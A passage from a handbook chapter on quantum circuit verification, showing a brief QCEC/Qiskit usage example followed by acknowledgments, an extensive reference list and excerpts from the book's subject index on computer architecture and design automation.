Example 21. Assume a quantum circuit has been compiled using IBM Qiskit in the
following fashion:
from qiskit import transpile
Then, after getting QCEC using the following: pip install mqt.qcec,
verifying that the compiled circuit still realizes the originally intended functionality
merely requires the following lines of Python:
ecm.run()
print(ecm.equivalence())
1438 R. Wille and L. Burgholzer
Conclusions
Acknowledgments This work received funding from the European Research Council (ERC)
under the European Union’s Horizon 2020 research and innovation program (grant agreement no.
101001318); was part of the Munich Quantum Valley, which is supported by the Bavarian state
government with funds from the Hightech Agenda Bayern Plus; and has been supported by the
BMK, BMDW, and the State of Upper Austria in the frame of the COMET program (managed by
the FFG).
References
Amy M, Gheorghiu V (2019) Staq – a full-stack quantum processing toolkit. arXiv: 1912.06070
Amy M, Maslov D, Mosca M, Roetteler M (2013) A meet-in-the-middle algorithm for fast
synthesis of depth-optimal quantum circuits. IEEE Trans CAD Integr Circuits Syst 32(6):818–
830
Barenco A et al (1995) Elementary gates for quantum computation. Phys Rev A, https://doi.org/
10.1103/PhysRevA.52.3457
Bergeron J (2006) Writing testbenches using system verilog. Springer, New York
Biere A, Kunz W (2002) SAT and ATPG: boolean engines for formal hardware verification. In:
International Conference on CAD, pp 782–785
Bookatz AD (2013) QMA-complete problems. arXiv: 1212.6312
Brandão FGSL, Harrow AW, Horodecki M (2016) Local random quantum circuits are approximate
polynomial-designs. Commun Math Phys 346(2):397–434
Brennan J et al (2021) Tensor Network Circuit Simulation at Exascale. arXiv: 2110.09894
Burgholzer L, Wille R (2020a) Improved DD-based equivalence checking of quantum circuits. In:
Asia and South Pacific Design Automation Conference
Burgholzer L, Wille R (2020b) The power of simulation for equivalence checking in quantum
computing. In: Design Automation Conference
Burgholzer L, Wille R (2021a) Advanced equivalence checking for quantum circuits. IEEE Trans
CAD Integr Circuits Syst, https://doi.org/10.1109/TCAD.2020.3032630
Burgholzer L, Wille R (2021b) QCEC: a JKQ tool for quantum circuit equivalence checking. Softw
Impacts, https://doi.org/10.1016/j.simpa.2020.100051
Burgholzer L, Raymond R, Wille R (2020) Verifying results of the IBM Qiskit quantum circuit
compilation flow. In: International Conference on Quantum Computing and Engineering
Burgholzer L, Raymond R, Sengupta I, Wille R (2021a) Efficient construction of functional repre-
sentations for quantum algorithms. In: International Conference of Reversible Computation
40 Verification of Quantum Circuits 1439
Burgholzer L, Kueng R, Wille R (2021b) Random stimuli generation for the verification of
quantum circuits. In: Asia and South Pacific Design Automation Conference
Burgholzer L, Bauer H, Wille R (2021c) Hybrid Schrödinger-Feynman simulation of quantum
circuits with decision diagrams. In: International Conference on Quantum Computing and
Engineering
Burgholzer L, Schneider S, Wille R (2022a) Limiting the search space in optimal quantum circuit
mapping. In: Asia and South Pacific Design Automation Conference
Burgholzer L, Ploier A, Wille R (2022b) Exploiting arbitrary paths for the simulation of quantum
circuits with decision diagrams. In: Design, Automation and Test in Europe
Chin-Yung L, Shiou-An W, Sy-Yen K (2011) An extended XQDD representation for multiple-
valued quantum logic. IEEE Trans Comput 1377–1389, https://doi.org/10.1109/TC.2011.114
Cross AW et al (2021) OpenQASM 3: a broader and deeper quantum assembly language. arXiv:
2104.14722 [quant-ph]
Doi J, Takahashi H, Raymond R, Imamichi T, Horii H (2019) Quantum computing simulator on a
heterogenous HPC system. In: International Conference on Computing Frontiers, pp 85–93
Drechsler R (2004) Advanced formal verification. Springer, https://doi.org/10.1007/b105236
Giles B, Selinger P (2013) Exact synthesis of multiqubit Clifford+T circuits. Phys Rev A
87(3):032332
Gottesman D (1997) Stabilizer codes and quantum error correction. Caltech
Green AS, Lumsdaine PL, Ross NJ, Selinger P, Valiron B (2013) Quipper: a scalable quantum
programming language. SIGPLAN Not 48(6):333. arXiv: 1304.3390
Grover LK (1996) A fast quantum mechanical algorithm for database search. In: Proceedings of
the ACM, pp 212–219
Guerreschi GG, Hogaboam J, Baruffa F, Sawaya NPD (2020) Intel Quantum Simulator: a cloud-
ready high-performance simulator of quantum circuits. Quantum Sci Technol, https://doi.org/
10.1088/2058-9565/ab8505
Hietala K, Rand R, Hung S-H, Wu X, Hicks M (2019) A verified optimizer for quantum circuits.
arXiv: 1912.02250
Hunter-Jones N (2019) Unitary designs from statistical mechanics in random quantum circuits.
arXiv: 1905.12053
Itoko T, Raymond R, Imamichi T, Matsuo A (2020) Optimization of quantum circuit mapping
using gate transformation and commutation. Integration 70:43–50
Janzing D, Wocjan P, Beth T (2005) “Non-identity check” is QMA-complete. Int J Quantum Inform
03(03):463–473
Jones T, Brown A, Bush I, Benjamin SC (2018) QuEST and high performance simulation of
quantum computers. Sci Rep, https://doi.org/10.1038/s41598-019-47174-9
Khatri S, LaRose R, Poremba A, Cincio L, Sornborger AT, Coles PJ (2019) Quantum-assisted
quantum compiling. Quantum 3:140
Kitchen N, Kuehlmann A (2007) Stimulus generation for constrained random simulation. In:
International Conference on CAD, pp 258–265
Klappenecker A, Rotteler M (2005) Mutually unbiased bases are complex projective 2-designs. In:
International Symposium on Information Theory, pp 1740–1744
Kueng R, Gross D (2015) Qubit stabilizer states are complex projective 3-designs. arXiv:
1510.02767
Laeufer K, Koenig J, Kim D, Bachrach J, Sen K (2018) RFUZZ: coverage-directed fuzz testing of
RTL on FPGAs. In: International Conference on CAD
Le HM, Große D, Bruns N, Drechsler R (2019) Detection of hardware trojans in SystemC HLS
designs via coverage-guided fuzzing. In: Design, Automation and Test in Europe
Li G, Ding Y, Xie Y (2019) Tackling the qubit mapping problem for NISQ-era quantum devices. In:
International Conference on Architectural Support for Programming Languages and Operating
Systems
Maslov D (2016) On the advantages of using relative phase Toffolis with an application to multiple
control Toffoli optimization. Phys Rev A 93(2):022311
Matsuo A, Hattori W, Yamashita S (2019) Reducing the overhead of mapping quantum circuits to
IBM Q system. In: IEEE International Symposium on Circuits and Systems
1440 R. Wille and L. Burgholzer
Murali P, Baker JM, Javadi-Abhari A, Chong FT, Martonosi M (2019) Noise-adaptive compiler
mappings for Noisy Intermediate-Scale Quantum computers. In: International Conference on
Architectural Support for Programming Languages and Operating Systems
Nam Y, Ross NJ, Su Y, Childs AM, Maslov D (2018) Automated optimization of large quantum
circuits with continuous parameters. npj Quantum Inf, https://doi.org/10.1038/s41534-018-
0072-4
Nielsen MA, Chuang IL (2010) Quantum computation and quantum information. Cambridge
University Press, Cambridge
Niemann P, Wille R, Miller DM, Thornton MA, Drechsler R (2016) QMDDs: efficient quantum
function representation and manipulation. IEEE Trans CAD Integr Circuits Systems
Pednault E, Gunnels JA, Nannicini G, Horesh L, Wisnieff R (2019) Leveraging secondary storage
to simulate deep 54-qubit Sycamore circuits. arXiv: 1910.09534
Schwinger J (1960) Unitary operator bases. In: Proc Natl Acad Sci 46(4):570–579
Seddon JR, Regula B, Pashayan H, Ouyang Y, Campbell ET (2020) Quantifying quantum
speedups: improved classical simulation from tighter magic monotones. arXiv: 2002.06181
Siraichi MY, dos Santos VF, Collange S, Pereira FMQ (2018) Qubit allocation. In: International
Symposium on Code Generation and Optimization
Smith KN, Thornton MA (2019) A quantum computational compiler and design tool for
technology-specific targets. In: International Symposium on Computer Architecture, pp 579–
588
Svore KM et al (2018) Q#: enabling scalable quantum computing and development with a high-
level domain-specific language. In: Proceedings of RWDSL. arXiv:1803.00652
Viamontes GF, Markov IL, Hayes JP (2004) High-performance QuIDD-Based simulation of
quantum circuits. In: Design, Automation and Test in Europe
Vidal G, Dawson CM (2004) Universal quantum circuit for two-qubit transformations with three
controlled-NOT gates. Phys Rev A 69(1):010301
Villalonga B et al (2019) A flexible high-performance simulator for verifying and benchmarking
quantum circuits implemented on real hardware. Npj Quantum Inf, https://doi.org/10.1038/
s41534-019-0196-1
Vincent T et al (2021) Jet: fast quantum circuit simulations with parallel task-based tensor-network
contraction. arXiv: 2107.09793 [quant-ph]
Watrous J (2018) The theory of quantum information. Cambridge University Press, Cambridge,
590pp
Wille R, Große D, Haedicke F, Drechsler R (2009) SMT-based stimuli generation in the SystemC
Verification library. In: Forum on Specification and Design Languages
Wille R, Burgholzer L, Zulehner A (2019) Mapping quantum circuits to IBM QX architectures
using the minimal number of SWAP and H operations. In: Design Automation Conference
Wille R, Hillmich S, Burgholzer L (2020) JKQ: JKU tools for quantum computing. In: Interna-
tional Conference on CAD
Wille R, Burgholzer L, Artner M (2021) Visualizing decision diagrams for quantum computing.
In: Design, Automation and Test in Europe
Yuan J, Pixley C, Aziz A (2006) Constraint-based verification. Springer
Zulehner A, Wille R (2018) One-pass design of reversible circuits: combining embedding and
synthesis for reversible logic. IEEE Trans CAD Integr Circuits Syst 37(5):996–1008
Zulehner A, Wille R (2019a) Compiling SU(4) quantum circuits to IBM QX architectures. In: Asia
and South Pacific Design Automation Conference, Tokyo, pp 185–190
Zulehner A, Wille R (2019b) Advanced simulation of quantum computations. IEEE Trans CAD
Integr Circuits Syst, https://doi.org/10.1109/TCAD.2018.2834427
Zulehner A, Wille R (2019c) Matrix-Vector vs. Matrix-Matrix multiplication: potential in DD-
based simulation of quantum computations. In: Design, Automation and Test in Europe
Zulehner A, Paler A, Wille R (2019d) An efficient methodology for mapping quantum circuits
to the IBM QX architectures. IEEE Trans CAD Integr Circuits Syst, https://doi.org/10.1109/
TCAD.2018.2846658
Zulehner A, Hillmich S, Wille R (2019e) How to efficiently handle complex values? Implementing
decision diagrams for quantum computing. In: International Conference on CAD
Index
C-to-RTL equivalence checking, 1195–1197 Datapath, 846, 847, 856, 863, 1257–1259,
CUBLAS, 410 1299, 1302, 1304, 1306, 1310, 1314
CUDA code, 82, 84, 147, 538 Data rate control, 101
CUDA Pitfall Detector for Real-Time Systems Data store, 611
(CUPiDRT ), 143 Data type customization, 1011, 1164
Cumulative distribution table (CDT) sampler, automatic bitwidth optimization, 1011
250 custom precision floating-point data types,
Current state variables, 1208 1012
Custom architectures, 407 float to fixed-point conversion, 1012
Custom instruction set extension, 846 Data types and operations, 879, 880
Custom instructions, 901 Data vectorization, 1010, 1016–1017
Custom integrated circuits, 407 DDR5, 211, 613, 620
Customized memory hierarchy, 998 Dead-code elimination, 1159
Custom precision floating-point data types, Deadline Monotonic (DM) scheduler, 133
1012 Debug, 952, 1254
CUTE, 1370 Decision tree classification (DTC), 371
Cyber-physical systems (CPS), 130, 707, Decision variables, 917
1028 Decode, 6
Cycle accurate simulation, 908, 923 Decoherence, 728
Cycle-based ISS, 974 Decoupled access-execute (DAE), 494, 1008
Cycle-level simulation Deep learning (DL), 233, 309, 423, 430, 460,
configurability, 906 649, 650, 681
definition, 905 Deep learning accelerator (DLA), 956, 959
metrics and system partitioning, 905 Deep neural network (DNN), 648–650, 652,
open-source simulators, 906 654, 659, 660, 664, 665, 671, 680, 682,
optimisation, 906 753, 797, 1046–1047
performance analysis, 905 ALWANN methodology, 1047–1048
Cycle-specific weakening, 1300, 1301 architecture description, 789
Cycles per instruction (CPI), 36, 927 cross-layer methodology, 1054–1055
Cyclic redundancy check (CRC), 459 energy and performance efficiency, of DNN
Cyclic shift registers, 1008 inference, 1055–1062
Cyclo-static dataflow (CSDF), 1119 energy-efficiency of, 791–793
evaluation and experiments, 1049–1051
speech recognition, 786
D training and classification, 787
Dark silicon, 563, 842 Defaxiom principle, 1327
DART, 1370 Defchoose principle, 1327
Data bounce, 187 Definitional principle, 1327, 1328
Datacenter FPGA, 456 Degree of fault tolerance, 313
Data center network (DCN), 584, 585 Delft Workbench (DWB), 994
Data communication, 573 Delite hardware definition language (DHDL),
Data dependencies, 895 996
Data Encryption Standard (DES), 238 Demand bound function, 134
Data-flow analysis, 1156 Dennard scaling, 596
Dataflow engines (DFEs), 994 Dennard’s Power Scaling, 51
Data-flow execution model, 1091 Denormal numbers, 391
Data flow graph (DFG), 36, 473, 476, 479, Dense linear algebra (DLA), 403
486, 488, 492, 1154, 1250 Design exercise, 1257–1259
Dataflow process network (DPN), 1121 Design rule checking (DRC), 754
Dataflow processor (DPU), 369 Design space exploration (DSE), 302, 350,
Data forwarding, 571 367, 568, 586, 850, 866, 867, 916–919,
Data hazards, 18–25 940, 941
Data-level parallelism, 536, 1163 analytical fitness evaluation, 926–927
Data parallelism, 1071, 1080 application exploration, 937–940
1448 Index
Graphical user interface (GUI), 820 Handling sparsity, in IoT devices, 101
Graphics, 885 compressed sparse formats, 103–104
Graphics cards of machine learning inner product approach, hardware
accelerators, 82 architecture for, 105–108
Graphics processing unit (GPU), 132, 137, matrix multiplication, approaches in,
138, 145, 146, 202, 233, 323, 408, 419, 102–103
532, 599, 636, 887, 990, 1085 outer product approach, hardware
accelerated DNN computations, 789 architecture for, 108–110
access-aware variable mapping to memory, Hard disk drive (HDD), 300
547–549 Hardened network transceivers, 423
advanced warp schedulers, hiding memory Hardware, 568, 569
access latency with, 550–551 Hardware accelerators, 1037–1038
arithmetic format support, 408 DNNs, 1046–1051
caches, 409 image and video processing applications,
constant memory, 546 1038–1046
energy efficiency, 552–555 Hardware and software architectures, for video
execution model, 536–538 coding, 224–226
global memory, 545 complexity reduction, 227
GPU for general purpose computing, DTM for HEVC, 229–232
536–549 low-power memory architectures, 227–229
graphics pipeline, 533–535 workload balancing, for multiple video
hardware architecture, 138–140, 540–545 tiles, 229
initial GPUs, 408 Hardware and software (HW/SW), 1380–1385
L1 and L2 caches, 547 partitioning, 958
performance, 550–552 performance optimization and validation,
programming interface, 538–540 959–960
register file, 409, 542 Hardware aspects, 896, 897
reliability, 555–557 Hardware-based emulation, 953
shader pipeline, 540–542 Hardware complexity, 50
shared memory, 546–547 Hardware debugging, 410
simplified architecture of traditional GPU Hardware description language (HDL), 843,
architecture, 534 850, 949, 953
SIMT stack, 544–545 Hardware emulation, 907, 908
single GPU, scheduling tasks on, 140–143 Hardware IFT, 1390
stream processing, 409 Hardware implementations
texture memory, 546 adders, 396–397
threading model, 139–140 dividers, 398
throttling memory access latency, 551–552 multipliers, 397–398
vectorization, 408 square root, 398
warp scheduler, 543–544 Hardware in the loop (HiL), 961
Graph isomorphism, 484 Hardware Performance Counters (HPCs), 194
Graph minor based technique, 489 Hardware reprogrammability, 423
Graph subdivision, 485 Hardware security
Gray code, 388–389 and data protection, 868
Greedy-Then-Oldest (GTO), 544 verification, 1390
Ground zero theory, 1327 Hardware/software integration, 867
Grover’s algorithm, 239, 734 Hardware vulnerabilities, 1390
G-share, 33 Harmonic mean (HM), 634
Gustafson’s Law, 52, 603 Harvard architecture, 5
HeteroCL, 1017–1019
Heterogeneous architecture, 842, 864
H Heterogeneous CPU cores, 637–638
Halide-HLS, 995, 1010 Heterogeneous image processing acceleration
Hamming distance, 1036 (Hipacc), 995
Index 1453
Synchronization, 129 T
Synchronous dataflow (SDF), 497–498, 1116, Tag store, 611
1119 Target-address, 7
Synchronous Parameterized and Interfaced Target binary program (TBP), 1372
Dataflow Embedded Runtime Target technology, 844–846
(SPIDER), 1139 Task granularity, 1091
Synopsys ARC cores, 909 Tasking model, 1077–1079
Synthesis, 418 Task instance, 131
System as a service (SAS), 86 Task-level parallelism, 1164
Systematic methodology for Automatic Logic Task mapping strategies, 573
Synthesis of Approximate circuits Task migration, 571
(SALSA), 1032–1033 Task parallelism, 1071
SystemC, 950–952, 967 Task scheduling, 571
SystemC 1.0, 951–952 Technology agnostic work
SystemC 2.0, 952 measurement error mitigation, 744
SystemC Modeling Library (SCML), 971, 976, noise-aware qubit mapping, 743–744
977 Technology-level laws, 51
SystemC Transaction Level Modeling Technology scaling, 278, 842
Standard, 967–969 Temperature, 223, 224, 231, 234
approximately timed modeling style, Temporal decoupling, 969
970–971 Temporal redundancy, 293
extended AT, 971 Temporal ROI-based coding, 97
extended loosely timed modeling style, 970 TEMU, 1370
loosely timed modeling style, 969 Tensilica TIE, 819–820, 831
System-level design, 916, 1247 Tensor processing unit (TPU), 471, 809
System-level power analysis, 958, 965–966 TensorFlow, 995
System-level power delivery network analysis TensorFlow-32 (TF32), 396
analysis methods, 777 Ternary Content-Addressable Memory
dynamic rail analysis, 781 (TCAM), 523
frequency- and time-domain analysis, Test selection phase, 1373
782–785 Texture memory, 546
static rail analysis, 778 Theorem prover, 1197
system-level power delivery network Theorem proving
modeling, 775 ACL2 preliminaries, 1324–1332
System matrix, 1422, 1423 analog systems, 1358
System-memory interfaces, 815 analysis of microarchitecture properties,
System of difference constraints (SDC), 856, 1338–1345
1001 concurrent protocols, 1358
System-on-chip (SoC), 139, 202–203, 211, formalization and analysis of (simplified)
469, 635–636, 1193, 1201, 1239, x86, 1345–1358
1380–1385 ISA, 1332–1337
accelerators, 208–209 and microprocessor assurance, 1322–1324
architecture optimization, 960 software verification, 1358
balanced processor architectures, 205 Thermal design point/thermal design
CPU memory parallelism, 206–208 power (TDP), 570, 576, 577,
CPU types, 204–205 605, 609
design and verification, 949–950 Thermal management, 574–577
processor, 203–208 Thinker series, 360–361
System under test (SUT), 1367 Thread-level parallelism (TLP), 469, 562,
Systolic array(s), 1004 601–604, 606, 628
architecture, 862, 866 Thread of control, 1164
Systolic mapping, 495 3D microarchitecture, 568
Index 1469